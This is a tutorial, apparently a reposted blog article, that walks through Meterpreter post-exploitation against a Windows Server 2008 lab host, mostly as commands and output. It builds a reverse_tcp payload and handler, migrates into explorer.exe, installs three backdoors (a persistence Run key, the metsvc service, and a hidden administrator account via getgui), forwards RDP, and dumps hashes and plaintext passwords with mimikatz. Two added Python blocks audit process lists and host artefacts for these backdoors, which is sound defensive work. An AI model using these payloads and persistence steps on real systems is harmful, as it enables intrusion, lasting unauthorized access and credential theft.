
A First Look at Meterpreter

2014-04-10 21:35

Attacker:
OS: Kali
IP: 192.168.111.129

Victim:
OS: Windows Server 2008 (64-bit)
IP: 192.168.111.133

First, generate the meterpreter payload on Kali:

root@Kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2013 X > file.exe  
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: {"LHOST"=>"192.168.111.129", "LPORT"=>"2013"}

Next, configure the listener:

root@Kali:~# msfconsole 
msf > use multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2013
LPORT => 2013
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2013
[*] Starting the payload handler...

Then run file.exe on the Windows 2008 host, and a meterpreter session comes back:

[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2013 -> 192.168.111.133:49168) at 2014-03-13 22:23:18 +0800

meterpreter >

Now to the main topic.

(1). Migrating meterpreter to another process

During a penetration test the current meterpreter process can easily be killed for all sorts of reasons, so migrating meterpreter into a long-running system process is a good idea.

meterpreter > getuid  // check the current privileges
Server username: WIN-K30V5SI0PCE\Administrator
meterpreter > ps      // list the current processes

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295                                
 4     0     System            x86_64  0                                         
 244   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\System32\csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\System32\dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\explorer.exe
 2204  2428  mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2312  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 2332  2044  file.exe          x86     1           WIN-K30V5SI0PCE\Administrator  C:\Users\Administrator\Desktop\file.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe

meterpreter > migrate 2044 // migrate into the explorer process with PID 2044
[*] Migrating from 2332 to 2044...
[*] Migration completed successfully.
meterpreter >

Verify:

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295                                
 4     0     System            x86_64  0                                         
 244   4     smss.exe          x86_64  0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 264   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 336   328   csrss.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 388   380   csrss.exe         x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\system32\csrss.exe
 396   328   wininit.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\wininit.exe
 432   380   winlogon.exe      x86_64  1           NT AUTHORITY\SYSTEM            C:\Windows\system32\winlogon.exe
 492   396   services.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\services.exe
 500   396   lsass.exe         x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\lsass.exe
 512   396   lsm.exe           x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\lsm.exe
 596   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 656   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 748   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\System32\svchost.exe
 796   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 840   492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 856   388   conhost.exe       x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\conhost.exe
 860   2044  cmd.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\cmd.exe
 884   492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\svchost.exe
 924   492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 972   492   sppsvc.exe        x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\sppsvc.exe
 976   492   spoolsv.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\spoolsv.exe
 1056  492   svchost.exe       x86_64  0           NT AUTHORITY\LOCAL SERVICE     C:\Windows\system32\svchost.exe
 1092  492   vmtoolsd.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1332  492   svchost.exe       x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\system32\svchost.exe
 1492  2044  vmtoolsd.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1560  492   dllhost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\dllhost.exe
 1640  492   msdtc.exe         x86_64  0           NT AUTHORITY\NETWORK SERVICE   C:\Windows\System32\msdtc.exe
 1968  492   taskhost.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\taskhost.exe
 2024  884   dwm.exe           x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\system32\Dwm.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\Explorer.EXE
 2312  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe
 2428  492   mscorsvw.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
 2972  492   svchost.exe       x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\system32\svchost.exe

As shown above, the file.exe process is gone. Note that if antivirus software is present, it may block the process injection.

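The process listing above is also what a defender sees when triaging the host. As an added example (not code from the original post), this Python parses a Meterpreter-style ps table and triages it over a constructed subset of the rows above, before and after the migration: it flags the 32-bit file.exe started from the Desktop, and shows that once the code has moved into explorer.exe the listing looks clean again.

```python
import re

# Constructed sample in the shape of the Meterpreter "ps" table from this
# write-up: a few rows taken before "migrate 2044" (the host is 64-bit).
PS_BEFORE = r"""
 PID   PPID  Name              Arch    Session     User                           Path
 ---   ----  ----              ----    -------     ----                           ----
 0     0     [System Process]          4294967295
 4     0     System            x86_64  0
 492   396   services.exe      x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\services.exe
 2044  2016  explorer.exe      x86_64  1           WIN-K30V5SI0PCE\Administrator  C:\Windows\explorer.exe
 2332  2044  file.exe          x86     1           WIN-K30V5SI0PCE\Administrator  C:\Users\Administrator\Desktop\file.exe
 2588  492   mscorsvw.exe      x86     0           NT AUTHORITY\SYSTEM            C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
"""
# The same listing after the migration: file.exe is gone, nothing else changed.
PS_AFTER = "\n".join(l for l in PS_BEFORE.splitlines() if not l.startswith(" 2332 "))

ARCHES = ("x86", "x86_64")
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")

def parse_ps(table: str) -> list:
    """Parse a Meterpreter 'ps' table. Columns are padded with two or more
    spaces; cell values (user names, 'Program Files') contain single spaces."""
    procs = []
    for line in table.splitlines():
        cells = re.split(r"\s{2,}", line.strip())
        if len(cells) < 3 or not cells[0].isdigit():
            continue  # header, underline and blank lines
        pid, ppid, name, *rest = cells
        arch = rest.pop(0) if rest and rest[0] in ARCHES else ""
        session = rest.pop(0) if rest and rest[0].isdigit() else ""
        user = rest.pop(0) if rest else ""
        path = rest.pop(0) if rest else ""
        procs.append({"pid": int(pid), "ppid": int(ppid), "name": name,
                      "arch": arch, "session": session, "user": user, "path": path})
    return procs

def triage(table: str, host_arch: str = "x86_64") -> list:
    """Flag processes started from user-writable directories; a 32-bit image
    there on a 64-bit host (the staged file.exe) is doubly suspicious, whereas
    32-bit vendor binaries under the Windows or Program Files trees are normal."""
    flagged = []
    for p in parse_ps(table):
        if not any(d in p["path"].lower() for d in USER_WRITABLE):
            continue
        reasons = ["runs from a user-writable directory"]
        if p["arch"] and p["arch"] != host_arch:
            reasons.append(f"{p['arch']} image on an {host_arch} host")
        flagged.append((p["pid"], p["name"], reasons))
    return flagged

def vanished(before: str, after: str) -> list:
    """PIDs present in the first snapshot but missing from the second: the only
    trace of the migration left in a plain process list, since explorer.exe keeps
    its PID and image path. Catching the injection itself needs thread/handle telemetry."""
    after_pids = {p["pid"] for p in parse_ps(after)}
    return [(p["pid"], p["name"]) for p in parse_ps(before) if p["pid"] not in after_pids]
```
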
(2). Testing whether the host is a virtual machine

meterpreter > run post/windows/gather/checkvm

[*] Checking if WIN-K30V5SI0PCE is a Virtual Machine .....
[*] This is a VMware Virtual Machine
meterpreter >

My Windows 2008 is installed on VMware.

(3). Installing a backdoor

Method 1: the persistence script

meterpreter > run  persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter >

Run it:

meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[*] Executing script C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HstWtPyXHYnhQ
meterpreter >

Now exit the session on the server and set up the listener again:

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.111.129
LHOST => 192.168.111.129
msf exploit(handler) > set LPORT 2241
LPORT => 2241
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.111.129:2241
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.111.133
[*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800

meterpreter >

As shown above, the connect-back succeeds. This passive type of backdoor is a good choice in certain special situations.

Method 2: metsvc

meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
     * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >

The metsvc backdoor is installed; next, connect to it:

root@Kali:~# msfconsole 
       =[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
+ -- --=[ 1239 exploits - 755 auxiliary - 207 post
+ -- --=[ 324 payloads - 31 encoders - 8 nops

msf > use multi/handler 
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/metsvc_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set RHOST 192.168.111.133
RHOST => 192.168.111.133
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > exploit

[*] Started bind handler
[*] Starting the payload handler...
[*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800

meterpreter >

Method 3:

This one amounts to adding an account and connecting over 3389 (Remote Desktop).

meterpreter > run getgui -u zero -p haizeiwang123_
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: zero with Password: haizeiwang123_
[*]     Hiding user from Windows Login screen
[*]     Adding User: zero to local group 'Remote Desktop Users'
[*]     Adding User: zero to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
meterpreter >
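
Each of the three methods leaves host artefacts that an administrator can audit for: a Run value pointing at a .vbs in %TEMP%, a service whose binary lives in a Temp directory, and an account hidden from the logon screen yet placed in Administrators and Remote Desktop Users. As an added example (not code from the original article), this Python runs such an audit over a constructed inventory built from the output above; the VMware and Spooler entries are assumed benign filler, and "hidden" stands for the value-0 entry getgui writes under Winlogon\SpecialAccounts\UserList.

```python
import re

# Constructed host inventory shaped after the artefacts the three backdoor
# methods above leave behind; the random names are taken from the output shown.
RUN_KEYS = [  # values under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    {"value": "HstWtPyXHYnhQ", "command": r"C:\Users\ADMINI~1\AppData\Local\Temp\UhyxOTTzTb.vbs"},
    {"value": "VMware User Process", "command": r"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr"},
]
SERVICES = [  # name and binary path of each installed service
    {"name": "metsvc", "binpath": r"C:\Users\ADMINI~1\AppData\Local\Temp\HzWbqqRpuBlxn\metsvc.exe"},
    {"name": "Spooler", "binpath": r"C:\Windows\System32\spoolsv.exe"},
]
LOCAL_USERS = [  # "hidden": listed with value 0 under Winlogon\SpecialAccounts\UserList
    {"name": "zero", "groups": {"Administrators", "Remote Desktop Users"}, "hidden": True},
    {"name": "Administrator", "groups": {"Administrators"}, "hidden": False},
]

USER_WRITABLE = re.compile(r"\\(users|temp|appdata|programdata)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|wsf|bat|cmd|ps1)\b", re.I)
PRIVILEGED = {"Administrators", "Remote Desktop Users"}

def looks_random(name: str) -> bool:
    """Metasploit names its artefacts with random mixed-case letters: letters only
    and many upper/lower flips. Heuristic; allow-list legitimate names that trip it."""
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return name.isalpha() and flips >= 4

def audit_run_keys(entries: list) -> list:
    findings = []
    for e in entries:
        why = []
        if USER_WRITABLE.search(e["command"]):
            why.append("target in user-writable path")
        if SCRIPT_EXT.search(e["command"]):
            why.append("script-interpreter payload")
        if looks_random(e["value"]):
            why.append("random value name")
        if why:
            findings.append(("run", e["value"], why))
    return findings

def audit_services(services: list) -> list:
    findings = []
    for s in services:
        why = []
        if USER_WRITABLE.search(s["binpath"]):
            why.append("binary in user-writable path")
        if any(looks_random(d) for d in s["binpath"].split("\\")[:-1]):
            why.append("random directory name")
        if why:
            findings.append(("service", s["name"], why))
    return findings

def audit_users(users: list) -> list:
    """Hidden from the logon screen yet able to log in interactively: the getgui pattern."""
    findings = []
    for u in users:
        priv = sorted(u["groups"] & PRIVILEGED)
        if u["hidden"] and priv:
            findings.append(("user", u["name"], ["hidden, member of " + ", ".join(priv)]))
    return findings

def audit_host() -> list:
    return audit_run_keys(RUN_KEYS) + audit_services(SERVICES) + audit_users(LOCAL_USERS)
```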

(4). Port forwarding

It is quite common for the host to sit on an internal network; metasploit ships with a port-forwarding tool.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.111.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.111.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter >

Next, run

rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

and you can connect.

(5). Obtaining passwords

The French tool mimikatz can obtain the operating system's plaintext passwords directly, and meterpreter has added it as a module.
First, load the mimikatz module.
Since my Windows 2008 is 64-bit, first migrate to a 64-bit process.

meterpreter > ps

......
 2000  472   dllhost.exe        x86_64  0           NT AUTHORITY\SYSTEM            C:\Windows\System32\dllhost.exe
 2264  1832  explorer.exe       x86_64  2           WIN-K30V5SI0PCE\zero           C:\Windows\explorer.exe
 2292  2264  vmtoolsd.exe       x86_64  2           WIN-K30V5SI0PCE\zero           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2520  372   FfBoPtYGlNj.exe    x86     1           WIN-K30V5SI0PCE\Administrator  C:\Users\ADMINI~1\AppData\Local\Temp\1\rad87A98.tmp\FfBoPtYGlNj.exe
 2780  2256  winlogon.exe       x86_64  2           NT AUTHORITY\SYSTEM            C:\Windows\System32\winlogon.exe
 3028  880   dwm.exe            x86_64  2           WIN-K30V5SI0PCE\zero           C:\Windows\System32\dwm.exe

meterpreter > migrate 2780
[*] Removing existing TCP relays...
[*] Successfully stopped TCP relay on 0.0.0.0:1234
[*] 1 TCP relay(s) removed.
[*] Migrating from 1428 to 2264...
[*] Migration completed successfully.
[*] Recreating TCP relay(s)...
[*] Local TCP relay recreated: 0.0.0.0:1234 <-> 192.168.111.133:3389
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

Retrieve the password hashes:

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     lm{ 179b3f1af1324ade301c14040883a0d8 }, ntlm{ 358c0a328bdf6b42185ca0a1773fb0be }
0;593431  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;593459  NTLM       WIN-K30V5SI0PCE  zero              lm{ bc61a4bbe791e26298911297f380ff1b }, ntlm{ 880be0798a0d1caebdf913bfcc28e1ad }
0;995     Negotiate  NT AUTHORITY     IUSR              n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE     n.s. (Credentials KO)
0;47971   NTLM                                          n.s. (Credentials KO)
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$  n.s. (Credentials KO)

Retrieve the plaintext passwords:

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain           User              Password
------    -------    ------           ----              --------
0;999     NTLM       WORKGROUP        WIN-K30V5SI0PCE$ 
0;996     Negotiate  WORKGROUP        WIN-K30V5SI0PCE$ 
0;47971   NTLM                                         
0;997     Negotiate  NT AUTHORITY     LOCAL SERVICE    
0;995     Negotiate  NT AUTHORITY     IUSR             
0;339062  NTLM       WIN-K30V5SI0PCE  Administrator     ceshimima123_
0;593459  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_
0;593431  NTLM       WIN-K30V5SI0PCE  zero              haizeiwang123_

Related reading: "A First Look at Meterpreter (Part 1)" and "SMB Relay Attacks Revisited"

[via @coolhacker]

Source: www.91ri.org/8625.html
